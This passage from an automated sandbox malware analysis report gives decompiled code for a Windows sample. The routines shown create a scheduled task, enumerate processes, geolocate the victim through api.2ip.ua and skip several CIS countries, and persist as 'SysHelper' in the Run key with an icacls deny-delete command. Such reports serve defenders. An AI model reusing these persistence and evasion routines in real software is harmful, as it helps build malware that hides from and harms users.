                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                    • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                    • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                    • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                    • API String ID: 2496729271-1738591096
                                                                                    • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                    • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                    • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                    • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    C-Code - Quality: 66%
                                                                                    			E00412220() {
                                                                                    				char _v8;
                                                                                    				_Unknown_base(*)()* _v12;
                                                                                    				_Unknown_base(*)()* _v16;
                                                                                    				unsigned int _v20;
                                                                                    				unsigned int _v24;
                                                                                    				WCHAR* _v28;
                                                                                    				int _v32;
                                                                                    				char _v36;
                                                                                    				char _v2084;
                                                                                    				char _v43044;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				intOrPtr* _t37;
                                                                                    				void* _t38;
                                                                                    				unsigned int _t40;
                                                                                    				void* _t50;
                                                                                    				struct HINSTANCE__* _t52;
                                                                                    				int _t56;
                                                                                    				signed int _t61;
                                                                                    				struct HINSTANCE__* _t62;
                                                                                    				void* _t63;
                                                                                    				struct HINSTANCE__* _t64;
                                                                                    				void* _t65;
                                                                                    				void* _t66;
                                                                                    
                                                                                    				E0042F7C0(0xa820);
                                                                                    				_t56 = 0;
                                                                                    				_v32 = 0;
                                                                                    				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
                                                                                    				_t62 = LoadLibraryW(L"kernel32.dll");
                                                                                    				_v8 = GetProcAddress(_t62, "EnumProcesses");
                                                                                    				_v12 = GetProcAddress(_t62, "EnumProcessModules");
                                                                                    				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
                                                                                    				_t37 = _v8;
                                                                                    				if(_t37 == 0) {
                                                                                    					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
                                                                                    					_t64 = _t52;
                                                                                    					_v8 = GetProcAddress(_t64, "EnumProcesses");
                                                                                    					_v12 = GetProcAddress(_t64, "EnumProcessModules");
                                                                                    					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
                                                                                    					_t37 = _v8;
                                                                                    				}
                                                                                    				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
                                                                                    				if(_t38 != 0) {
                                                                                    					_t61 = 0;
                                                                                    					_t40 = _v20 >> 2;
                                                                                    					_v24 = _t40;
                                                                                    					if(_t40 != 0) {
                                                                                    						do {
                                                                                    							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
                                                                                    							if(_t63 != 0) {
                                                                                    								_push( &_v36);
                                                                                    								_push(4);
                                                                                    								_push( &_v8);
                                                                                    								_push(_t63); // executed
                                                                                    								if(_v12() != 0) {
                                                                                    									_v16(_t63, _v8,  &_v2084, 0x400);
                                                                                    									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
                                                                                    									_t66 = _t66 + 8;
                                                                                    									if(_t50 == 0) {
                                                                                    										_t56 = _t56 + 1;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							CloseHandle(_t63);
                                                                                    							_t61 = _t61 + 1;
                                                                                    						} while (_t61 < _v24);
                                                                                    					}
                                                                                    					return _t56;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}




























                                                                                    APIs
                                                                                    • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                    • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                    • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                    • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                    • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                    • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                    • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                    • API String ID: 3668891214-3807497772
                                                                                    • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                    • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                    • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                    • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 988 40cf10-40cfb0 call 42f7c0 call 42b420 InternetOpenW call 415c10 InternetOpenUrlW 995 40cfb2-40cfb4 988->995 996 40cfb9-40cffb InternetReadFile InternetCloseHandle * 2 call 4156d0 988->996 997 40d213-40d217 995->997 999 40d000-40d01d 996->999 1000 40d224-40d236 997->1000 1001 40d219-40d221 call 422587 997->1001 1002 40d023-40d02c 999->1002 1003 40d01f-40d021 999->1003 1001->1000 1006 40d030-40d035 1002->1006 1005 40d039-40d069 call 4156d0 call 414300 1003->1005 1013 40d1cb 1005->1013 1014 40d06f-40d08b call 413010 1005->1014 1006->1006 1008 40d037 1006->1008 1008->1005 1015 40d1cd-40d1d1 1013->1015 1023 40d0b9-40d0bd 1014->1023 1024 40d08d-40d091 1014->1024 1017 40d1d3-40d1db call 422587 1015->1017 1018 40d1de-40d1f4 1015->1018 1017->1018 1021 40d201-40d20f 1018->1021 1022 40d1f6-40d1fe call 422587 1018->1022 1021->997 1022->1021 1026 40d0cd-40d0e1 call 414300 1023->1026 1027 40d0bf-40d0ca call 422587 1023->1027 1029 40d093-40d09b call 422587 1024->1029 1030 40d09e-40d0b4 call 413d40 1024->1030 1026->1013 1039 40d0e7-40d149 call 413010 1026->1039 1027->1026 1029->1030 1030->1023 1042 40d150-40d15a 1039->1042 1043 40d160-40d162 1042->1043 1044 40d15c-40d15e 1042->1044 1045 40d165-40d16a 1043->1045 1046 40d16e-40d18b call 40b650 1044->1046 1045->1045 1047 40d16c 1045->1047 1050 40d19a-40d19e 1046->1050 1051 40d18d-40d18f 1046->1051 1047->1046 1050->1042 1053 40d1a0 1050->1053 1051->1050 1052 40d191-40d198 1051->1052 1052->1050 1054 40d1c7-40d1c9 1052->1054 1055 40d1a2-40d1a6 1053->1055 1054->1055 1056 40d1b3-40d1c5 1055->1056 1057 40d1a8-40d1b0 call 422587 1055->1057 1056->1015 1057->1056
                                                                                    C-Code - Quality: 86%
                                                                                    			E0040CF10() {
                                                                                    				WCHAR* _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				WCHAR* _v24;
                                                                                    				char _v40;
                                                                                    				intOrPtr _v44;
                                                                                    				WCHAR* _v48;
                                                                                    				char _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				WCHAR* _v72;
                                                                                    				char _v88;
                                                                                    				intOrPtr _v92;
                                                                                    				WCHAR* _v96;
                                                                                    				char _v112;
                                                                                    				intOrPtr _v116;
                                                                                    				intOrPtr _v120;
                                                                                    				intOrPtr _v124;
                                                                                    				intOrPtr _v128;
                                                                                    				intOrPtr _v132;
                                                                                    				char _v136;
                                                                                    				intOrPtr _v140;
                                                                                    				intOrPtr _v144;
                                                                                    				intOrPtr _v148;
                                                                                    				intOrPtr _v152;
                                                                                    				long _v156;
                                                                                    				char _v10395;
                                                                                    				void _v10396;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				void* _t90;
                                                                                    				void* _t95;
                                                                                    				intOrPtr _t102;
                                                                                    				intOrPtr _t119;
                                                                                    				signed int _t122;
                                                                                    				void* _t128;
                                                                                    				WCHAR* _t129;
                                                                                    				WCHAR* _t131;
                                                                                    				intOrPtr* _t134;
                                                                                    				void* _t135;
                                                                                    				void* _t142;
                                                                                    				void* _t146;
                                                                                    				intOrPtr* _t147;
                                                                                    				void* _t149;
                                                                                    				signed int _t151;
                                                                                    				void* _t152;
                                                                                    				void* _t153;
                                                                                    				intOrPtr* _t157;
                                                                                    				void* _t158;
                                                                                    				void* _t159;
                                                                                    				intOrPtr _t160;
                                                                                    				void* _t161;
                                                                                    
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4ca850);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t160;
                                                                                    				E0042F7C0(0x2890);
                                                                                    				_push(_t128);
                                                                                    				_push(_t152);
                                                                                    				_v10396 = 0;
                                                                                    				E0042B420( &_v10395, 0, 0x27ff);
                                                                                    				_t161 = _t160 + 0xc;
                                                                                    				_t90 = InternetOpenW(L"Microsoft Internet Explorer", 0, 0, 0, 0); // executed
                                                                                    				_t149 = _t90;
                                                                                    				_v92 = 7;
                                                                                    				_push(0x1b);
                                                                                    				_v96 = 0;
                                                                                    				_v112 = 0;
                                                                                    				E00415C10(_t128,  &_v112, _t149, _t152, L"https://api.2ip.ua/geo.json");
                                                                                    				_v8 = 0;
                                                                                    				_t94 =  >=  ? _v112 :  &_v112;
                                                                                    				_t95 = InternetOpenUrlW(_t149,  >=  ? _v112 :  &_v112, 0, 0, 0, 0); // executed
                                                                                    				_t153 = _t95;
                                                                                    				if(_t153 != 0) {
                                                                                    					InternetReadFile(_t153,  &_v10396, 0x2800,  &_v156); // executed
                                                                                    					InternetCloseHandle(_t153);
                                                                                    					InternetCloseHandle(_t149);
                                                                                    					_push(0x10);
                                                                                    					_v44 = 0xf;
                                                                                    					_v48 = 0;
                                                                                    					_v64 = 0;
                                                                                    					E004156D0(_t128,  &_v64, _t149, "\"country_code\":\"");
                                                                                    					_v8 = 1;
                                                                                    					_v20 = 0xf;
                                                                                    					_v24 = 0;
                                                                                    					_v40 = 0;
                                                                                    					if(_v10396 != 0) {
                                                                                    						_t134 =  &_v10396;
                                                                                    						_t23 = _t134 + 1; // 0x1
                                                                                    						_t146 = _t23;
                                                                                    						do {
                                                                                    							_t102 =  *_t134;
                                                                                    							_t134 = _t134 + 1;
                                                                                    						} while (_t102 != 0);
                                                                                    						_t135 = _t134 - _t146;
                                                                                    					} else {
                                                                                    						_t135 = 0;
                                                                                    					}
                                                                                    					_push(_t135);
                                                                                    					E004156D0(_t128,  &_v40, _t149,  &_v10396);
                                                                                    					_v8 = 2;
                                                                                    					_t106 =  >=  ? _v64 :  &_v64;
                                                                                    					if(E00414300( &_v40,  >=  ? _v64 :  &_v64, 0, _v48) == 0xffffffff) {
                                                                                    						L30:
                                                                                    						_t129 = 0;
                                                                                    					} else {
                                                                                    						_t156 = E00413010( &_v40,  &_v136, _t107 + _v48, 0xa);
                                                                                    						if( &_v40 != _t114) {
                                                                                    							if(_v20 >= 0x10) {
                                                                                    								L00422587(_v40);
                                                                                    								_t161 = _t161 + 4;
                                                                                    							}
                                                                                    							_v20 = 0xf;
                                                                                    							_v24 = 0;
                                                                                    							_v40 = 0;
                                                                                    							E00413D40( &_v40, _t156);
                                                                                    						}
                                                                                    						if(_v116 >= 0x10) {
                                                                                    							L00422587(_v136);
                                                                                    							_t161 = _t161 + 4;
                                                                                    						}
                                                                                    						if(E00414300( &_v40, "\"", 0, 1) == 0xffffffff) {
                                                                                    							goto L30;
                                                                                    						} else {
                                                                                    							E00413010( &_v40,  &_v88, 0, _t116);
                                                                                    							_t131 = _v72;
                                                                                    							_t151 = 0;
                                                                                    							_v152 = "RU";
                                                                                    							_v148 = "BY";
                                                                                    							_v144 = "UA";
                                                                                    							_v140 = "AZ";
                                                                                    							_v136 = "AM";
                                                                                    							_v132 = "TJ";
                                                                                    							_v128 = "KZ";
                                                                                    							_v124 = "KG";
                                                                                    							_v120 = "UZ";
                                                                                    							_v116 = "SY";
                                                                                    							do {
                                                                                    								_t147 =  *((intOrPtr*)(_t159 + _t151 * 4 - 0x94));
                                                                                    								if( *_t147 != 0) {
                                                                                    									_t157 = _t147;
                                                                                    									_t61 = _t157 + 1; // 0x500005
                                                                                    									_t142 = _t61;
                                                                                    									do {
                                                                                    										_t119 =  *_t157;
                                                                                    										_t157 = _t157 + 1;
                                                                                    									} while (_t119 != 0);
                                                                                    									_t158 = _t157 - _t142;
                                                                                    								} else {
                                                                                    									_t158 = 0;
                                                                                    								}
                                                                                    								_t144 =  >=  ? _v88 :  &_v88;
                                                                                    								_t121 =  <  ? _t131 : _t158;
                                                                                    								_t122 = E0040B650( >=  ? _v88 :  &_v88, _t147,  <  ? _t131 : _t158);
                                                                                    								_t161 = _t161 + 4;
                                                                                    								if(_t122 != 0 || _t131 < _t158 || (_t122 & 0xffffff00 | _t131 != _t158) != 0) {
                                                                                    									goto L24;
                                                                                    								} else {
                                                                                    									_t129 = 1;
                                                                                    								}
                                                                                    								L26:
                                                                                    								if(_v68 >= 0x10) {
                                                                                    									L00422587(_v88);
                                                                                    									_t161 = _t161 + 4;
                                                                                    								}
                                                                                    								_v68 = 0xf;
                                                                                    								_v72 = 0;
                                                                                    								_v88 = 0;
                                                                                    								goto L31;
                                                                                    								L24:
                                                                                    								_t151 = _t151 + 1;
                                                                                    							} while (_t151 < 9);
                                                                                    							_t129 = 0;
                                                                                    							goto L26;
                                                                                    						}
                                                                                    					}
                                                                                    					L31:
                                                                                    					if(_v20 >= 0x10) {
                                                                                    						L00422587(_v40);
                                                                                    						_t161 = _t161 + 4;
                                                                                    					}
                                                                                    					_v20 = 0xf;
                                                                                    					_v24 = 0;
                                                                                    					_v40 = 0;
                                                                                    					if(_v44 >= 0x10) {
                                                                                    						L00422587(_v64);
                                                                                    						_t161 = _t161 + 4;
                                                                                    					}
                                                                                    					_v44 = 0xf;
                                                                                    					_v48 = 0;
                                                                                    					_v64 = 0;
                                                                                    				} else {
                                                                                    					_t129 = 0;
                                                                                    				}
                                                                                    				if(_v92 >= 8) {
                                                                                    					L00422587(_v112);
                                                                                    				}
                                                                                    				 *[fs:0x0] = _v16;
                                                                                    				return _t129;
                                                                                    			}

























































                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0040CF4A
                                                                                    • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                    • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                    Strings
                                                                                    • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                    • "country_code":", xrefs: 0040CFE1
                                                                                    • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                    • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                    • API String ID: 1485416377-2962370585
                                                                                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                    • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                    • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    [Figure: control-flow graph of function 411cd0; legend: Executed, Not Executed]
                                                                                    C-Code - Quality: 77%
                                                                                    			E00411CD0(void* __ebx, void* __edx, intOrPtr _a4) {
                                                                                    				long _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				WCHAR* _v24;
                                                                                    				void* _v28;
                                                                                    				void* _v32;
                                                                                    				int _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				WCHAR* _v44;
                                                                                    				char _v60;
                                                                                    				int _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				WCHAR* _v72;
                                                                                    				char _v88;
                                                                                    				int _v92;
                                                                                    				intOrPtr _v96;
                                                                                    				WCHAR* _v100;
                                                                                    				char _v116;
                                                                                    				intOrPtr _v120;
                                                                                    				char _v140;
                                                                                    				struct _PROCESS_INFORMATION _v156;
                                                                                    				char _v172;
                                                                                    				struct _STARTUPINFOW _v248;
                                                                                    				short _v2296;
                                                                                    				char _v4342;
                                                                                    				short _v4344;
                                                                                    				char _v6390;
                                                                                    				char _v6392;
                                                                                    				short _v8440;
                                                                                    				short _v12536;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				int _t124;
                                                                                    				intOrPtr _t133;
                                                                                    				_Unknown_base(*)()* _t137;
                                                                                    				short _t150;
                                                                                    				intOrPtr _t160;
                                                                                    				long _t171;
                                                                                    				int _t202;
                                                                                    				intOrPtr _t207;
                                                                                    				void* _t213;
                                                                                    				void* _t221;
                                                                                    				intOrPtr* _t223;
                                                                                    				signed int _t225;
                                                                                    				WCHAR* _t228;
                                                                                    				signed int _t230;
                                                                                    				intOrPtr* _t232;
                                                                                    				signed int _t234;
                                                                                    				intOrPtr* _t237;
                                                                                    				signed int _t239;
                                                                                    				intOrPtr _t242;
                                                                                    				void* _t245;
                                                                                    				WCHAR* _t246;
                                                                                    				void* _t247;
                                                                                    				void* _t248;
                                                                                    				void* _t250;
                                                                                    				void* _t253;
                                                                                    				void* _t257;
                                                                                    				intOrPtr _t263;
                                                                                    				void* _t264;
                                                                                    				void* _t266;
                                                                                    
                                                                                    				_t221 = __ebx;
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4cac68);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t263;
                                                                                    				E0042F7C0(0x30e8);
                                                                                    				_push(_t253);
                                                                                    				_v32 = 0;
                                                                                    				_t250 = __edx; // executed
                                                                                    				_t124 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v32); // executed
                                                                                    				if(_t124 != 0) {
                                                                                    					L50:
                                                                                    					 *[fs:0x0] = _v16;
                                                                                    					return _t124;
                                                                                    				}
                                                                                    				_v6392 = _t124;
                                                                                    				_v36 = 1;
                                                                                    				E0042B420( &_v6390, _t124, 0x7fe);
                                                                                    				_t264 = _t263 + 0xc;
                                                                                    				_v64 = 0x400;
                                                                                    				RegQueryValueExW(_v32, L"SysHelper", 0,  &_v36,  &_v6392,  &_v64); // executed
                                                                                    				RegCloseKey(_v32);
                                                                                    				_v40 = 7;
                                                                                    				_v44 = 0;
                                                                                    				_v60 = 0;
                                                                                    				if(_v6392 != 0) {
                                                                                    					_t223 =  &_v6392;
                                                                                    					_t245 = _t223 + 2;
                                                                                    					do {
                                                                                    						_t133 =  *_t223;
                                                                                    						_t223 = _t223 + 2;
                                                                                    					} while (_t133 != 0);
                                                                                    					_t225 = _t223 - _t245 >> 1;
                                                                                    					L6:
                                                                                    					_push(_t225);
                                                                                    					E00415C10(_t221,  &_v60, _t250, _t253,  &_v6392);
                                                                                    					_v8 = 0;
                                                                                    					_t255 = _v44;
                                                                                    					if(_v44 == 0) {
                                                                                    						L19:
                                                                                    						_v8 = 0xffffffff;
                                                                                    						if(_v40 >= 8) {
                                                                                    							L00422587(_v60);
                                                                                    							_t264 = _t264 + 4;
                                                                                    						}
                                                                                    						_t137 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathW");
                                                                                    						_t256 = _t137;
                                                                                    						_v92 = 0;
                                                                                    						lstrcpyW( &_v8440,  *(CommandLineToArgvW(GetCommandLineW(),  &_v92)));
                                                                                    						_v36 = PathFindFileNameW( &_v8440);
                                                                                    						 *_t137(0, 0x1c, 0, 0,  &_v2296);
                                                                                    						__imp__UuidCreate( &_v172);
                                                                                    						_v24 = 0;
                                                                                    						__imp__UuidToStringW( &_v172,  &_v24);
                                                                                    						_t246 = _v24;
                                                                                    						_v96 = 7;
                                                                                    						_v100 = 0;
                                                                                    						_v116 = 0;
                                                                                    						if( *_t246 != 0) {
                                                                                    							_t228 = _t246;
                                                                                    							_t57 =  &(_t228[1]); // 0x2
                                                                                    							_t256 = _t57;
                                                                                    							do {
                                                                                    								_t150 =  *_t228;
                                                                                    								_t228 =  &(_t228[1]);
                                                                                    							} while (_t150 != 0);
                                                                                    							_t230 = _t228 - _t256 >> 1;
                                                                                    							goto L26;
                                                                                    						} else {
                                                                                    							_t230 = 0;
                                                                                    							L26:
                                                                                    							E00415C10(_t221,  &_v116, _t250, _t256, _t246);
                                                                                    							_v8 = 1;
                                                                                    							__imp__RpcStringFreeW( &_v24, _t230);
                                                                                    							_t257 = PathAppendW;
                                                                                    							_t154 =  >=  ? _v116 :  &_v116;
                                                                                    							PathAppendW( &_v2296,  >=  ? _v116 :  &_v116);
                                                                                    							CreateDirectoryW( &_v2296, 0); // executed
                                                                                    							if(_t250 == 0) {
                                                                                    								L33:
                                                                                    								_v68 = 7;
                                                                                    								_v72 = 0;
                                                                                    								_v88 = 0;
                                                                                    								if(_v2296 != 0) {
                                                                                    									_t232 =  &_v2296;
                                                                                    									_t247 = _t232 + 2;
                                                                                    									do {
                                                                                    										_t160 =  *_t232;
                                                                                    										_t232 = _t232 + 2;
                                                                                    									} while (_t160 != 0);
                                                                                    									_t234 = _t232 - _t247 >> 1;
                                                                                    									L38:
                                                                                    									_push(_t234);
                                                                                    									E00415C10(_t221,  &_v88, _t250, _t257,  &_v2296);
                                                                                    									_v8 = 2;
                                                                                    									PathAppendW( &_v2296, _v36);
                                                                                    									DeleteFileW( &_v2296); // executed
                                                                                    									CopyFileW( &_v8440,  &_v2296, 0); // executed
                                                                                    									_v28 = 0;
                                                                                    									_t171 = RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v28); // executed
                                                                                    									if(_t171 != 0) {
                                                                                    										L45:
                                                                                    										if(_v68 >= 8) {
                                                                                    											L00422587(_v88);
                                                                                    											_t264 = _t264 + 4;
                                                                                    										}
                                                                                    										_t124 = 0;
                                                                                    										_v68 = 7;
                                                                                    										_v72 = 0;
                                                                                    										_v88 = 0;
                                                                                    										if(_v96 >= 8) {
                                                                                    											_push(_v116);
                                                                                    											L49:
                                                                                    											_t124 = L00422587();
                                                                                    										}
                                                                                    										goto L50;
                                                                                    									}
                                                                                    									_v4344 = _t171;
                                                                                    									E0042B420( &_v4342, _t171, 0x7fe);
                                                                                    									_t266 = _t264 + 0xc;
                                                                                    									lstrcpyW( &_v4344, "\"");
                                                                                    									lstrcatW( &_v4344,  &_v2296);
                                                                                    									lstrcatW( &_v4344, L"\" --AutoStart");
                                                                                    									RegSetValueExW(_v28, L"SysHelper", 0, 2,  &_v4344, lstrlenW( &_v4344) + _t183); // executed
                                                                                    									RegCloseKey(_v28);
                                                                                    									_t236 = _a4;
                                                                                    									if(_a4 != 0) {
                                                                                    										E00413260(_t236, lstrcpyW,  &_v2296);
                                                                                    									}
                                                                                    									E0042B420( &_v248, 0, 0x44);
                                                                                    									_t264 = _t266 + 0xc;
                                                                                    									_v248.cb = 0x44;
                                                                                    									_v248.dwFlags = 1;
                                                                                    									_v248.wShowWindow = 0;
                                                                                    									SetLastError(0);
                                                                                    									lstrcpyW( &_v12536, L"icacls \"");
                                                                                    									_t194 =  >=  ? _v88 :  &_v88;
                                                                                    									lstrcatW( &_v12536,  >=  ? _v88 :  &_v88);
                                                                                    									lstrcatW( &_v12536, L"\" /deny *S-1-1-0:(OI)(CI)(DE,DC)");
                                                                                    									_t202 = CreateProcessW(0,  &_v12536, 0, 0, 0, 0x48, 0, 0,  &_v248,  &_v156); // executed
                                                                                    									if(_t202 != 0) {
                                                                                    										do {
                                                                                    										} while (WaitForSingleObject(_v156, 1) == 0x102);
                                                                                    									} else {
                                                                                    										GetLastError();
                                                                                    									}
                                                                                    									goto L45;
                                                                                    								}
                                                                                    								_t234 = 0;
                                                                                    								goto L38;
                                                                                    							}
                                                                                    							if(_v2296 != 0) {
                                                                                    								_t237 =  &_v2296;
                                                                                    								_t68 = _t237 + 2; // 0x2
                                                                                    								_t248 = _t68;
                                                                                    								do {
                                                                                    									_t207 =  *_t237;
                                                                                    									_t237 = _t237 + 2;
                                                                                    								} while (_t207 != 0);
                                                                                    								_t239 = _t237 - _t248 >> 1;
                                                                                    								L32:
                                                                                    								_push(_t239);
                                                                                    								E00415C10(_t221, _t250, _t250, _t257,  &_v2296);
                                                                                    								goto L33;
                                                                                    							}
                                                                                    							_t239 = 0;
                                                                                    							goto L32;
                                                                                    						}
                                                                                    					}
                                                                                    					_t213 = E00413520( &_v60,  &_v140, 1, _t255 - lstrlenA("\" --AutoStart") - 1);
                                                                                    					_t262 = _t213;
                                                                                    					if( &_v60 != _t213) {
                                                                                    						if(_v40 >= 8) {
                                                                                    							L00422587(_v60);
                                                                                    							_t264 = _t264 + 4;
                                                                                    						}
                                                                                    						_v40 = 7;
                                                                                    						_v44 = 0;
                                                                                    						_v60 = 0;
                                                                                    						E004145A0( &_v60, _t262);
                                                                                    					}
                                                                                    					if(_v120 >= 8) {
                                                                                    						L00422587(_v140);
                                                                                    						_t264 = _t264 + 4;
                                                                                    					}
                                                                                    					_t216 =  >=  ? _v60 :  &_v60;
                                                                                    					_t124 = PathFileExistsW( >=  ? _v60 :  &_v60);
                                                                                    					if(_t124 == 0) {
                                                                                    						goto L19;
                                                                                    					} else {
                                                                                    						_t242 = _a4;
                                                                                    						if(_t242 != 0) {
                                                                                    							_t124 =  &_v60;
